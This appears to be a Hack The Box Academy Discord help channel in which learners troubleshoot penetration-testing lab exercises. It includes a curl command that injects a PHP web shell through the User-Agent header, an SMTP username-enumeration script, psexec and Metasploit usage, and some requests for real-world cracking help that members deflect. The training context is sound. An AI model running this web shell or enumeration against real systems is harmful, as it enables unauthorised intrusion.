Hi, I'm kind of new to windows and I was wondering what are the prerequisites for the following command to work ?
psexec.py <USER>:'<PASS>'@<IP>
From what I understood, it needs the ADMIN$ share for the SMB protocol to be writeable by the user I try to log in as, am I right ?
That's correct
Perfect thanks !
Is there any other tool that enables us to get RCE on a windows machine through SMB if the ADMIN$ share is not writeable ?
Well you can always test for eternal blue or eternal romance but I'm not aware of any other method
Alright I get it thanks
Any idea why everything works when I inject using curl but I get a 500 error when I inject with Burp?
curl -s "http://94.237.48.12:43356/index.php" -H "User-Agent: injected<?php system(\$_GET['cmd']); ?>"
Can any1 pls help me with this question?
probably because bash is attempting to evaluate the symbols, use ' single quotes
The curl command is actually working and I get RCE through the web shell.
If I try the same with Burp I get the error message.
try a simpler command maybe? I'm confused as well now 
How i join to team in ctf ?
Show to me No Access
Please help me
Were you able to get anything to work and the answer isn't correct or is nothing working?
hi!!! can you look at my smuggling request? because it works when i look myself, my cookie is logged (with my normal request) but it seems the admin never hit the page.
I found it. It was the \ before the $_GET which I copied from the curl command 🙈
Can anyone help me in this question
By examining the logs located in the "C:\Logs\Dump" directory, determine if an ill-intended login took place after the LSASS dump. Answer format: Yes or No
Someone for a hint/help on the chapter "Exploitation of Request Smuggling" of "HTTP Attacks" modules.|| i have the http request smuggling. i can log any request on the site in the comment section, i tested on myself but the admin never visit the site||
Yes
You can DM what you have and I can try to steer you in the right direction.
Thx
I figured out my flag… what a silly module question
Hi, I'm on the module "Cracking Passwords with Hashcat" on the page "Cracking Miscellaneous Files & Hashes", I have a strong difficulty solving the optional question with the vmx file to crack with hashcat. Could I have some help please?
Pivoting Tunneling and Port Forwarding | Web Server Pivoting with RPivot
Transferred client.py to pivot host - get this error when trying to run it:
Traceback (most recent call last): File "client.py", line 12, in <module> import relay ImportError: No module named relay
Any ideas on how to fix / why? Please @ with responses
I'm stuck on Nmap Firewall and IDS/IPS Evasion - Hard Lab
I think I have pretty much tried everything so far, read modules 2 times but Idk what am I missing
I looked and I think the answer is stringFromJNI() but the system says it is an incorrect answer.
me 2
nvm i got it
Source-ports are your friend
Can anyone help me?
attacking common services module attacking ftp questions. Found a user and logged in but the flag and user is wrong
now can't install python2.7 on pwnbox [I have kali on a bare-metal install and when I tried originally I got the provided error above] any help would be great
resolved - didn't copy the whole folder and just did client.py
Hey guys. I'm working on the Skills Assessment on Introduction to Windows commandline and I'm stuck at this point to ssh into the target.
Is the password supposed to be an empty string or just empty. I've been trying both with no luck. Your help will be appreciated.
Each password for the next user is the previous answer
Hey does any admin / mod help me ?
With?
i talk with someone sorry for disturbing
What do you need help with?
i talk with someone sorry for disturbing
anyone know why I am having trouble spawning the machine for this task? it says "cannot spawn vip machines in non vip server". I have vip+
Change vpn region; also wrong channel to ask in
ahh mb, which channel should I ask in?
Is anyone available to help with Cross-Site Scripting (XSS) > Session Hijacking? The end of section question.
https://academy.hackthebox.com/module/103/section/1008
I have my cookie but can't seem to add it in the Storage tab. The instructions say to click the + and add our cookie. Clicking the + doesn't allow me to add anything.
When you click + it should add a blank field/value or a randomly generated field
And you can edit the name and value from that
Ahh, there we are. Thank you!
I'm a bit terrified of the Skills Assessment at the end of this module 🤣
Im having an issue with pwnbox bash, can someone help me?
Reach out to support on the website
Need to speak to a person? Learn how to reach our support via HTB Labs.
the ai support thing told me to go here, or thats how I interpreted it atleast
If youre having problems with the pwnbox crashing: thats a platform issue that support can handle
oh no, its not that it crashes
its just a thing about bash that i dont understand
there's a module where i have to use the ssh command in pwnbox, and when i use it and it asks for the password, the caret turns thick and white and i stop being able to type
Oh, it doesnt stop you from typing
It intentionally hides what you type, for security reasons
ohh
thank you, now it worked
like really, thanks a lot
This is why phrasing your question properly helps :)
Well to be fair, Patriot thought it was a bash problem, so original question was about that.
Then it was actually something else, that happens
Well the og statement was phrased as a pwnbox issue
Welcome! And keep at it!
And originally, they said "crash" not bash
oh, I thought it was bash. Alright then.
i said pwnbox bash, but maybe thats not the right term
Close enough! You had a problem, asked for help, and got it. That's the important part. And to have fun!
Well bash is its own thing not specific to the pwnbox
Bash is just the language that the terminal uses to execute commands
Yes!
and it is quite fun, especially when you get past things that previously were difficult
Yes indeed! 🙂
i need some confirmation if the module answer for this section, is working fine : https://academy.hackthebox.com/module/257/section/3761
because i enter the answer in multiple ways and says is wrong, but i am not sure if i am wrong or the answer need a specific format to be taken like completed
hey guys for the path Introduction to Threat Hunting & Hunting With Elastic >Threat Hunting With The Elastic Stack>Hunting for Stuxbot I have a real issue with the question #2
Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.
I Actually think I got the path but is not getting accepted in the answer. Can someone help me with that?
Hello,
Someone out there has done HTTP Attacks skill assessment, my CRLF is not working and I have HTTP smuggling working.
Some can help me please.
it should be a folder you're looking for unless that shortcut is supposed to contain sumn important
Hey guys hope everyone is having a great day, in the Footprinting module, in the SMTP section, the Question "Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer."
I tried to ask an ai to code a python script, which would use the usernames in the footprinting-usernames.txt given, and then output the valid usernames which i believe would not return a status code of 252, or 505. but for some rzn whenever i tried , it said connection refused.
So my question is, is there like a rate-limiting thingy which is on SMTP, or is that just a shit script from the Ai?
Thanks in advance
```python
import argparse
import smtplib
import sys
import os


def check_smtp_user(server, port, username):
    """Check if a username is valid using SMTP VRFY command."""
    try:
        # Connect to the SMTP server
        smtp = smtplib.SMTP(server, port, timeout=5)
        # Send VRFY command
        code, message = smtp.verify(username)
        smtp.quit()
        # Check for 252 status code
        return code == 252, message.decode('utf-8') if isinstance(message, bytes) else message
    except (smtplib.SMTPConnectError, smtplib.SMTPServerDisconnected, ConnectionRefusedError):
        print(f"Error: Could not connect to {server}:{port}")
        return False, None
    except smtplib.SMTPException as e:
        print(f"SMTP error for {username}: {str(e)}")
        return False, None


def main():
    # Parse command-line arguments
    parser = argparse.ArgumentParser(description="Check usernames against an SMTP server using VRFY.")
    parser.add_argument("server", help="SMTP server address (e.g., mail.example.com or IP)")
    parser.add_argument("port", type=int, help="SMTP server port (e.g., 25)")
    parser.add_argument("username_file", help="Path to text file with usernames (one per line)")
    args = parser.parse_args()

    # Check if username file exists
    if not os.path.isfile(args.username_file):
        print(f"Error: Username file '{args.username_file}' not found.")
        sys.exit(1)

    # Output file for valid users
    output_file = "valid_users.txt"
    # Clear the output file if it exists
    with open(output_file, 'w') as f:
        f.write("")

    print(f"Checking usernames against SMTP server {args.server}:{args.port}...")

    # Read usernames and check each
    valid_users = []
    with open(args.username_file, 'r') as f:
        for username in f:
            username = username.strip()
            if not username:  # Skip empty lines
                continue
            is_valid, message = check_smtp_user(args.server, args.port, username)
            if is_valid:
                print(f"Valid user found: {username} (Response: {message})")
                valid_users.append(username)

    # Save valid users to output file
    with open(output_file, 'a') as f:
        for user in valid_users:
            f.write(f"{user}\n")

    # Display results
    if valid_users:
        print(f"\nValid usernames saved to {output_file}:")
        with open(output_file, 'r') as f:
            print(f.read().strip())
    else:
        print("No valid usernames found.")
    print("Done.")


if __name__ == "__main__":
    main()
```
sorry if this looks like it floods the chat, but it would rlly help me if can someone tell me why it didnt work
I don't think this has been resolved yet. I followed the steps to install the WebDav redirector but I get an error saying that I don't have the "adequate user rights" to make the changes
There's already an enum script that exists
smtp-user-enum
oh i just took a look at it, it sums up everything i wanted
i just realized the ai script can work, but my dumbass didnt notice the target server ran out of time 💔 🥀
i sat for a whole hour switching between scripts just for that to be the issue
Introduction to Bash Scripting
Conditional Execution
not sure how to do this
It explicitly tells you what to do
Yes but i cant write code i can only read code
Im physically unable to do it
There's code given in the reading
You copy/paste and insert the condition where it tells you
Remote Code Execution (RCE) via the Theme Editor
Im not staff, and haven't done that module
Oh okay
I suggest focusing on one module at a time. Unless you finished up the bash module and moved on to the wp one
Did you edit the right theme 404?
Also that module is above t0, so avoid spoilers
Bash i havent finished, but im almost done with wordpress because i was previously almost done
with it, just trying to get the ones i done out of the way halfway
CJCA is about to be taken in a weeks time
Yes
Apologies, i put a shell cmd in , do i have permission to post the shell cmd here?
The cmd looks right
yeah, not sure why it cant be executed
Look at uname --help or uname -h to see the values
But also for that question: if youre getting "parrot..." youre not connected to the target machine
trying to work out why the module will not accept answer, and just read that
a bit annoying
It also helps to give the module name and section
LOL, of course but was doubting myself more than the module and section
Well if you give the module and section people are able to help you more with the expected format of the answer
understood, but I wanted to verify I was not typing in an incorrect command more than I was seeking help on a particular module question
ssh into worked
Ah, the classic issue of not reading the given instructions
excuse me?? The fact that the in browser instance exists infers that the user has a choice, there are instances where the user cannot use SSH, so will use the in browser. There is nothing in the instructions to say do not use, I mean why is it there?
keep the snark to yourself, please
This wasn't an attack on you, this is a common issue that people face
And ill repeat myself every time ig:
Spawn instance -> this starts the in-browser attack box
Click here to spawn target -> this spawns the target to attack/connect to
I believe this distinction is made in the Intro to academy module
skill assessment - wordpress attacks
Submit the contents of the flag file in the directory with directory listing enabled.
what does the word "directory listing" mean?
Visiting the endpoint lists the files instead of loading a webpage, essentially
Ah okay thank you
I.e. if you start a python web server, then visit in a browser -> you get the directory listed
hey everyone. I'm doing "Pentest in a Nutshell", section "Windows Enumeration" (https://academy.hackthebox.com/module/296/section/3402), and for some reason i can't get the right answer for: "What is the exact OS Version that WinPEAS delivers?" I've run different versions of winPEAS, used other commands, and its not accepting any variation of the exact OS. what am I missing?
Look at this section again "https://academy.hackthebox.com/module/195/section/2182" and try to identify which methods returns a string from native C++ back to Java.
What result did you get after running WinPEAS?
||10.0.17763||
You're very close, however the result is incomplete. You need a full string.
That doesn't help. Ive copied and pasted many strings from the different winPEAS.
struggling with it still
The question asks the exact OS version which would follow this format like this:
<Version of Windows> <specific service pack, N/A if none> <Build> <Build number>
well that should be ||10.0.17763.2628|| which is still not being accepted
and ||Microsoft Windows Server 2019 Standard 10.0.17763.2628|| doesnt work lol.
You can dm me.
is there a default password for wordpress?
does anyone have a good wordlist to give me?
for which module?
no module but yes for personal use real tests
Hey may I get some help for the wordpress module on
yes but I am Brazilian and my english is weak I still can not see how I do to access other channels
Follow the instructions in #welcome
Just ask for help in here, don't have to tag someone. Always say which module/section/question you're on, what you've tried, etc (make sure not to reveal contents of modules above tier 0)
How do I use the tools in termux tool X
Alright I need help with this if possible, i got the wordpress output results just not sure what to do next
Always say the module/section/question you're on
Looks like you just put the text of the flag in the field there.
Thats the thing i cant find it
Actually, i did a wordpress scan with wpscan but nothing appears for a flag value
Oh, you had said you found the output. Like I said earlier then, no need to tag people directly. Just say what module/section/question you're on.
for this question i havent
No one's going to scour each section of the module to find that question. You really should just include it in your initial post.
Alright i'll leave it till last
it is 5am for me so i should probably continue tomorrow
but you're just waking up
i havent slept
i been up all night grinding through the CJCA im like 80% done nearly
It's fine i'll have a go when im awake completing skills assessment
hacker for hire it seems
Nope...
Self trained programmer and a web developer but it's seems difficult due to limited resources....just needed a bit assistance with some work..
Hope I'm breaking the rules in anyways
Not breaking the rules anyways..
Well, I suggest you go over the channels above and if you wanna learn, go to https://academy.hackthebox.com
Thanks....
i am currently on the setting up module visualization and to say the least i am lost . do i install proxmox or VirtualBox or do i install both
most of those are just showcasing various ways to setup vm's you can use.
you just need to pick one. i like vmware myself, but whatever works for you. you don't need to setup a vps etc.
personal preference and probably some features
vmware workstation pro is free now, proxmox is good
got thank you
Thank you. It worked.
The lab about "Exploitation of Request Smuggling" in the HTTP Attack module isnt working properly. i was confirmed that my smuggling request is the good one but the admin never visit the website so i can have his cookie posted where it must be. And please you must stop simulated http request smuggling labs, put the time it is needed to really implement a vulnerable lab
This isn't a hacker for hire server, go look for professionals in the industry through other means.
From the name it seems like it is a hacking community and what i mean from hiring is just helping me out or just be with me in the company. Anyways Thanks bro
We're a learning community specifically for the hack the box platform.
Great. It seems like you are too passionate about your things . So, can you please suggest me any community where i can find professional as I don’t know much about this app. New to the platform. Thankyou
Hey everyone please need a help . What other server is secure and fast for creaking a password and clone a password. I tried many but couldn't find a secure server .
Thanks in advance
I went through the code lines one by one. But I couldn't get anywhere. I think there was a bug on Hackthebox's side. I don't know how many hours I spent on this question, but thanks anyway.
im stuck at the introduction to assembly course skill assessment i managed to make the shellcode.o file now idk what to do next
for task 1
just link it using ld to make it an elf assuming you want to run it
google "make elf file from object files using ld/linker"
i make the file into .elf then run it?
im like 90% sure the academy module will have instructions on how to do it considering its supposed to teach you and all
yes i know where to find the command to make into elf im just asking if i must make into elf
if you want to run it, yeah
right ok
Try using request repeating to be able to quickly test commands. With that, try looking for the other how i solve this in Repeating Requests
module- SHELLS & PAYLOADS
PHP Web Shells
i have uploaded the webshell and its giving the wrong file type error as intended , but when i go into the burp to modify the request i cant find the particular request in which the shell is present . there is no post request in the list.?
Setting up
The multiplexer
Copied pasted .tmux.conf text and created a file and now my dock looks like this)
so my query is which nerd font should i install to fix the icons stuff
Hi
Contact local law enforcement, we can't help you
Ok
for the assembly introduction skill assessment task 1 do i have to run it in the server
In this section, look at the example code of Hello from C++, you'll find the answer there.
The following snippet of C++ code shows a function that returns the string Hello from C++.
.....
I found it, thank you. It's really nice to find it without going crazy, you're great.
https://academy.hackthebox.com/module/112/section/1080 Can anyone give me some advice on this topic? I have no idea. I just scanned what ports are open and tried to connect, and entered the account and password. Regardless of whether it is a real username or not, the result returned is the same.
I recommend to go through the section one more time before moving on.
Guys hello If I cancel current subscription will modules opened by it get closed?
Only modules you haven't completed afaik
so if the module isn't completed it will get closed?
I believe so. It's best to reach out to support to confirm
Hi, I have this same issue, probably just being a silly goose but can anyone give me a hint?
Hacking WordPress
Skills assessment
Well im in the LFI vulnerable plugin and im not able to make changes to the website plugin code
make sure you edit the right 404.php page
Hey how did you get around this? I also don't know what to do once I've found the three ports XD
there is no 404.php page
for the plugin file
Guys who has completed WPA2 module of HTB what to do if the reaver is waiting for very long
?
can someone give me a nudge , i figured the LFI vuln but it doesnt let me read the file with users in
"Sorry, that file cannot be edited."
Still stuck on Windows Privilege Escalation Pillaging path for CPTS on HTB academy I cant login into slack I got the cookie for the user but doesn't work it base 64 encoded it for the user grace pls help been stuck for a week on this question
I don't remember it well but .. I got the same error then what I did was made the lfi trigger when I visited a 404 page.
I see
so there's a 404 page somewhere hmm
Dm me
Need some help with Windows Privilege Escalation - Windows Server.
My Metasploit is telling me that the bind is failing because the ip:port is either in use or unavailable:
||msf6 exploit(windows/smb/smb_delivery) > [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (10.129.133.121:445).||
Might wanna check for services running on the port then.
I already did, it says that PID 4 is listening in on it and the processname is System
Are you using the pwnbox? If so it might be using that, might wanna resort to another method to gain the meterpreter shell
I am using my own vm
Run msfconsole with sudo maybe
I already ran it as root
I'd just swap to a different shell method, you can still escalate with any form of meterpreter session
Ah alright, will try another method then
Attacking WPA/WPA2 Wi-Fi Networks has someone completed this module and what to do if reaver works very slow?
Sorry to bother you guys, I have a small question. Is there any connection between the three labs in a module: Easy, Medium, Hard? Just like the footprinting module.
what you mean in connections?
Typically no
Also the footprinting labs arent necessarily as connected as you think
OK, thank you. But I have no idea for the last hard part of the footprinting module. Do you have any idea?
hard lab
Im not at home today to check my notes, I dont recall if thats the one with important.txt
No, the important.txt is on Medium
Then I dont have that one in memory
Have you tried scanning UDP?
I tried -A
Hi guys
That doesnt scan UDP
Register an account? That doesnt sound familiar to that one
Pretty sure he's referring to the mail service
yes
Still doesnt make sense 😉
He never mentioned register simply that he tried to auth
Ah, brain is mush
My brain combined regardless and entered somehow
But you should be able to find a real user/pass
Scan UDP and use the techniques for footprinting the service you found
No brute forcing (of the mail service) required
Hey, i am in the AEN module and im trying to conduct port forwarding to get a reverse shell back to my host from dev01 with ligolo, can someone please assist me setting up the listener with ligolo ? for some reason i cannot get the shell back ^^
If you read the engagement brief (the paragraph above the lab) you should be able to figure it out
I use chatgpt, and it keeps asking me to brute force it
Listener should point back to you, a:1234 -> you:4321, ligolo connect to a:1234
Because you overlooked a port
can I pleasepleaseplease DM you with a snippet 🙂 ?
Im not at my home today to do troubleshooting
But the biggest part of AEN should be learning to unstick yourself
Look to and read documentation and double pivot guides
Im assuming youre doing AEN blind as well
yes sir !
What does this role that I currently have mean?
HTB Certified Hyphen Specialist
Minor
oh how did you know i'm minor 😦
and how HTB know my age 😂
Because you filled out the form?
Lmao
The parental consent form
Only staff can assign it, not mods
I got really scared I hope HackTheBox didn't ban me!
yep 🙂
Only certain staff have access to view the uploaded form, and they assign that role manually to help keep track of users. That way if you say something, and dont have the role, then someone will double check then prompt you to fill out the form and send it in
Due to HTB ToS stuff
oh
nice
hats off to hackthebox
is the 3rd skill assessment on attacking common applications supposed to be as easy as using the type command?
The hard assessments often seem in the wrong order
yeah lol, i mentally prepared myself for war but had it completed in like 5 minutes
I just got to footprinting, and honestly, feels like I’m almost done with this whole thing!
Ok. Struggling with "Web services and API attacks" final assessment. Am i supposed to be sending requests to http://target:port/wsdl?wsdl
Like, is that the correct endpoint? Or am i missing something?
Sorry
Really sorry
Bro, i wish you luck.
This is my face before and after the penetration tester pathway. Hell, even the windows priv esc & active directory was enough.
if ur just starting it i pity you, ive been at it for 3 days because of how boring it is
I hate enumeration 😔
But, its important to know anyway
i try to motivate myself because i know active directory enumeration is even more boring
Sorry @uneven obsidian I did not give permission to dm
Hi, just started the CPTS track and racking my head on Nibbles 🙄 (yeah, I know). I can work through everything except the privilege escalation. I have tried multiple scripts in my monitor.sh, but it always prompts me for the password of the 'nibbler' user, sudo -l looks good. I have tried resetting the machines and following different walkthroughs, but I always get prompted. Any clue what I am missing?
Use the full path
Hi guys, I'm stuck on the Password Attacks - Skills Assessment
I've logged in to the DMZ, found some creds (don't know what to do with them), did pivoting using chisel
But when i tried to scan using nmap from my machine, it doesn't give the expected output. But at the same time, if run nmap from DMZ, I see the ports.
Is this expected behavior or am i missing something ?
If using proxychains, icmp hates proxychains
I've given -Pn in both the nmap commands
Yup, I'm trying that, but I'm not sure if proxychains is working or not. As there is no way to verify
man just use ligolo for pivoting
Sure, will try that
Marcie in WPA2 attacks module is it possible that on target one can't capture full handshake when doing 4 way handshake capture?
I haven't done that module
understand
i changed several targets on previous task until the target worked normally
Hi guys, I tried using ligolo, but while doing nmap scan, in the ligolo terminal, all nmap requests are getting the same error CONNECTION REFUSED. Is it that the host is blocking the nmap requests ?
nevermind, I'm just dumb, got the requests
Lol
That's it...so simple, but it worked, thank you. Didn't realize you needed the full path, but now I do.
Well, i found some creds (hw.....) and tried connecting to the open services on F01, but not getting logged-in. Can anyone give any hints on where I can use it ?
Typically, when sudo specifies a full path; use full path
Think of the type of server F could be
So maybe its not used for some services but you can authenticate on others 😉
Can I DM you, if you don't mind ?
Im not at home, and likely won't be available until tomorrow. Im just relaying what I recall from recently redoing it
Sure, I won't actually be asking you to solve it, just need to share info
Im aware, im telling you im at limited capacity
Im at a party for my mom's bday
Ohh okay then no worries, thanks for your help 🫡
Someone who finished the AEN module and can assist me with doing the port forwarding with Ligolo?
I managed to do it with ssh port forwarding but I want to try more methods.
I will shared detailed snippets and explanations in DM
Happy birthday to your mum! 🎉 Hope you all have a great time!
Solving the Password Attack - Skill Assessment, I've found where the creds are used in F01, found some other usernames as well, but the files which I thought might be interesting is just the HTB staff messing with me. Can someone DM as can't disclose information here
anyone wants to get into blue teaming hit me up im putting something together for people starting out / wanting to start in cyber
i am in bash scripting and stuck on this question
```bash
var='8dm7KsjU28B7v621Jls'
value='ERmFRMVZ0U2paTlJYTkxDZz09Cg'
for i in {1..40}
do
    var=$(echo $var | base64)
    if [[ $var == *$value* ]] && [ ${#var} -ge 113469 ]; then
        echo ${var: -20}
    fi
done
```
here's my code
Guys hello has anyone done Attacking WPA/WPA2 Wi-Fi Networks
if someone has done pls contact me
Are you looking for accessing a local port?
I’m looking to get a reverse shell on the internal network from my attack host
Guys hello has anyone done Attacking WPA/WPA2 Wi-Fi Networks if someone has done pls contact me
So I need to use dmz01 host as a jump server
A pivot? Jump server means something, so i just want to be sure I'm tracking.
Yeah you can DM
I'm in Credential Hunting in Network Shares - I'm getting no results from netexec when spidering the remote share: nxc smb 10.129.239.172 -u user -p pass --spider \\path\to\share --content --pattern "passw"
It just says "Done spidering", and dumps me back to a prompt.
Any idea what's going on?
You can DM what you are trying.
Hey ya, I am looking for one of my doubts to be resolved, can anyone help me?
Hey yeah, just wanna know about one part of a file transfer module " Living off the Land" and I am a bit confused about it.
the problem is I am having confusion about bits admin file sharing, when I tried to do it over local host , it didn't happen first later, I tried asking chatgpt for it and it told me that we need to create an http server first for the file transfers.
@tidal thorn No.
thank u 😔
@pine cypress try not to spoil things; and no its not a side effect of ligolo.
Many people do AEN blind, so sharing stuff can ruin people's experiences. Not to mention it's above tier 0
Apologies, I didn't realize I was sharing too much.
My best assumption is youre not dialing the right ip, not that ligolo is broken
@trim shale careful with screenshots containing answers
Also, theres instructions above the first question. You're expected to run the commands to get the answers from that ssh session
yes i saw them but i tried following the syntax that is shown before but i assume im not writing it right
i saw before that the command to connect to the target was "ssh htb-student@[IP address]" but when i try to put the ip address it takes the ip as the hostname
Hi i have a problem with an exploit in shells and payloads module
Metasploit doesnt find 50064.rb exploit i dont know why
so i finally wrote the syntax for the ssh correct but now the password that was given is incorrect and the access is denied
Copy and paste instead of typing
Ctrl+shift+v to paste in terminal
Did you a find a workable exploit ?
I try yesterday without success
If you have the cookie just go in firefox => developer tools => memory and add a new cookie
Let's not drag this out for fucks sake
...
My bad
hello
I am doing the section of Android fundamentals and I haven't been able to pass these two questions
can someone help me I tried multiple things and nothing worked
So I usually get my build number by settings --> about phone --> build number
I know how to check for the hidden files, just cant authenticate need a nudge please
Introduction to Windows Command Line
skills assessment
I have never done this from a security point of view and know nothing about offensive ops against Android, I'm just saying this as a person who uses an Android phone every day lol
reminder that the password for user3 is the answer for the question for user2
I did do that method you asked it didnt work for some reason
for "If you search and find the name of this host, you will find the flag for user2.", I used and it didn't work
yeah makes sense for example the number is UE1A.230829.036.A4
but I don't get how HTB wants the answer
did you remember proper Capitalization?
Ah,,,,,,,, holdoon
wait no cause i copied it and pasted
was the copy/paste lowercased?
Usually longer I think
i got it
thank you for the nudge
Mine is QP1A.190771.020.XXXXXXXXXXXXX for example
I mean my phone's not the skill assessment
So that might be an indicator. Unsure however since it may differ based on the version
still need help
the module : SHELLS & PAYLOADS
The Live Engagement
question : Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt
i have figured almost everything but at the end when i run the 50064 exploit in msfconsole its saying :
[-] Exploit failed: One or more options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.
any hints ?
type options, make sure everything is filled out correctly. looks like the remote host is wrong or something.
you likely haven't specified the host
i have done that infact i have double checked the rhost is correct (blog.inlanefreight.local)
Hello,
Any good resource to learn cloud security on HTB?
I started studying cybersecurity Which module do i start
its not like i cannot define dns in msf as rhost , is it?
intro to academy
Finished
no, you'd need to add that to your hosts file
for that wont i be needing the ip .?
yeah
its not specified anywhere so i need to figure that out myself.
at the bottom of the page there should be text "click here to spawn the target" which will spawn the victim target for you and provide an ip
but that is the ip for the foothost machine ,, what have that to do with local dns file .
you can use the VHOST name, also the /etc/hosts file exists
can i dm u ? if u dont mind
no, i'm mostly recalling this info and not looking at my notes. I do not wanna get up
@proud jasper that's not what this server is about
Really, okay thanks
Hey, I'm struggling with the Server-Side-Attacks module of CBBH Pathway (specifically Identifying SSRF). I have found three ports but can't work out how to get the flag. Has anyone done this module before and can give me a hint?
You can DM me
Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt
im in the target , its saying access denied for viewing the flag .. so i need to do privilege escalation?
Anyone ? ..
Hey, i'm hard stuck on module https://academy.hackthebox.com/module/134/section/1206 can anyone confirm that the lab works with the method taught on that page? so i'll know whether the problem is on my end or htb
how do i edit an asm code with GDB
I need a hint in Skills Assessment - Password Attacks
I'm currently on J01 machine using bd**** creds. I tried dumping hashes, but the Admin hashes are not there, not sure what I'm missing. I even pivoted to DC01 using PiT, dumped the creds there, but haven't got any. If you guys have a hint, it would be great. Thanks
dude this is a hacking server so idk why ur tryna phish people in here
why is bro sending us a mediafire file
anyways <@&861185840277487616>
scam account
ty
also its in cwee chat
One guy once came here and was asking for moving to some link. He was probably the dumbest person in the world
Update: I tried dumping the hashes using reg (the triple S) on J01 as well as on DC01 but I still haven't found the right hash 😭
hello, im in AD enum MODULE doing ACL ENUM, how long its takes no have the output.
i thinks its ok btw
hello
I am doing the section of Android fundamentals and I haven't been able to pass these two questions.
can someone help me I tried multiple things and nothing worked
Any hint for Abusing HTTP Misconfigurations Skills Assessment - Easy
I feel like I have tried literally anything, even found XSS that seems useless, please anything would help
Hi, I am planning to buy the academy student subscription. So how do I purchase it. When I checked academy help center, I need to send mesage in HTB chat, but I am not seeing any chat bubble in my htb academy pages.
Module: AEN
I'm doing this module blind ^^
I exported with sharphound collection the json files but when I try to upload them to bloodhound it gets stuck on 0%
I have tried to clear the DB of neo4j and I've tried to upload .json file of the tombwatcher machine which uploaded instantly..
Any suggestions ?
there is a big difference obviously between the file sizes but it literally stuck on 0% for a while
Are the versions of Sharphound and BloodHound compatible?
no oops
if my bloodhound version is 4.3.1, do I need to download sharphound 4.3.1?
the last sharphound version is 2.7.0 which this is the one I used
It just has to be compatible, not have the same version number.
well, it's working, i guess it happened because the computer json file is 2.07 MB
Hi everyone, where can we report outdated information encountered in a module?
@acoustic owl it seems that the issue is only with the computes.json file, i tried to collect only this file again and upload it to bloodhound but the same issue is happening..
the other json files has successfully uploaded
May I dm you please ?
i have tried making an XOR loop for the rbx register but no work
As already mentioned, the versions of BloodHound and SharpHound must be compatible. If the import does not work, this is often the reason.
Sure, but I can't tell you anything different in DMs than I've already told you here.
but the other json files has uploaded successfully
guys i'm having problems connecting to the htb vpn, somebody can help me?^
i use sudo name.ovpn
and it starts to connect
but when i go to the selected ip address it doesn't work
Apache 2 default page appears
Can you try pinging the machine IP ?
yeah all packets arrive
Then it might be intentional.
Check the port in the URL
@acoustic owl thanks again to the one and only !! 🙂 always helpful
Hi guys, Im doing CBBH path and currently working on module/80/section/781
So I have tried to > a seq from 0->1000
then used ffuf to brute force but currently stuck
can anyone help?
Good Afternoon guys I need little help with module Ai pls
I solved it. It was so stupid, I previously uploaded the same hash, but the system didn't accept it, now it does
pls I need help
I am having trouble using xfreerdp in the ssh session for:
AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the C:\flag.txt file on MS01.
My main error was:
failed to open display:
Please check that the $DISPLAY environment variable is properly set.
The most recent recommendation on how to fix this issue was to use ligolo-ng. I was able to get agent to run on the ssh machine and proxy to run on the local machine. When I run the sudo ip route add targetip dev ligolo during setup, I lose access to the targetip entirely. What am I supposed to route to in ligolo-ng when setting up a pivot for this scenario? Please don't roast me too hard
I can't understand the command output. I had to use ctrl+c to stop it otherwise it would continue without stopping. I can't understand what the password and username should be.
Are you running rdp as root?
Isn’t that the point of the section?
Just as a normal user
when I run it as administrator it tells me sudo: netexec: command not found
you can x forward but is rdp needed there?
RDP is needed for later questions
For the Linux attacks?
the service is winrm
Don’t run as root then
I'm not sure if I'm doing something wrong
Did the question ask to check with both lists?
Yeah
in the question it says to find the user and then his password
Why did you cancel the attack then
I might just say Start in ligolo next time to see if it causes issues. Maybe Route to ssh is not a good idea since I'm already using it.
I used ligolo for this part too but I’m not sure if it was necessary to pivot if you already have the parrot ssh
since there are not many words in the file with the list of passwords and usernames, so it seemed pointless to let it do so
I already tried leaving it for 5 minutes but it doesn't find anything
It could even be the last combination
If that’s allowed if not sorry
Please contact Instagram Support.
What did you use for route?
I'm assuming not Targetip
The internal subnet
I'm assuming ens224 or docker0 right?
Whichever the dc is on
Dc?
The subnet the internal machines you're attacking
Hey all, i have a question about attacking common applications: thick client. https://academy.hackthebox.com/module/113/section/2139 The module says "Checking the memory maps at this stage of the execution, of particular interest is the map with a size of 0000000000003000 with a type of MAP and protection set to -RW--" But it doesn't explain WHY this frame in the memory map is interesting. is it the -RW-- that is indicating it? does the size have anything to do with it? Typically what would you be looking for when digging through these? Thanks for anyone who can help!
Hey, I'm doing the credential hunting in network shares exercise in the password attacks module (https://academy.hackthebox.com/module/147/section/1334) . I'm stuck trying to find the Domain Admin password. I ran Snaffler with the command ./Snaffler.exe -u -o snaffler.log -m C:\Users\Public\Documents . Looking through all the files returned from the Admin share I still haven't found any working creds. There are a lot of mentions of the word 'password' in the Snaffler output but none seem to be the Domain Admin, what should I do to refine my search?
Does someone knows why bloodhound sometimes does not resolve the group name ? for some groups on bloodhound I see their SID and the domain name without the group name
Try instead to use a pattern to search
Like in the file explorer?
Or using nxc
Hey guys, I'm barely getting by with this password attacks module, does anyone has any good resources were I can learn more about PtT. I feel like the information is all over the place.
guys I am having issues with pivoting module, on port forwarding doing everything right to access the rdp on the internal network but its showing filtered when running nmap, have tried everything, please help needed with that!
Hello
Replicate the Credential Dumping attack described in this section and provide the NTLM hash of the Administrator user as your answer. "C:\Tools\Sysmon" and "C:\Tools\Mimikatz" on the spawned target contain everything you need.
Having a problem with this question in Analyzing evil with sysmon and event logs
When I tried to search event 10 there is no logs
in sysmon
anyone can help please
Out-of-Band DNS
??
I got the event log 10 in sysmon but cant find the correct I tried searching for mikimatz and agentEXE but nothing is found can someone help here please
Always best to include the module, section ,and question you're on, not just one or two
https://academy.hackthebox.com/module/167/section/1633
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
I pulled the event ID but it says this.
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
3/28/2023 12:53:54 PM 4625 Information An account failed to log on....
3/28/2023 12:53:54 PM 4625 Information An account failed to log on....
doesnt even give me what account failed
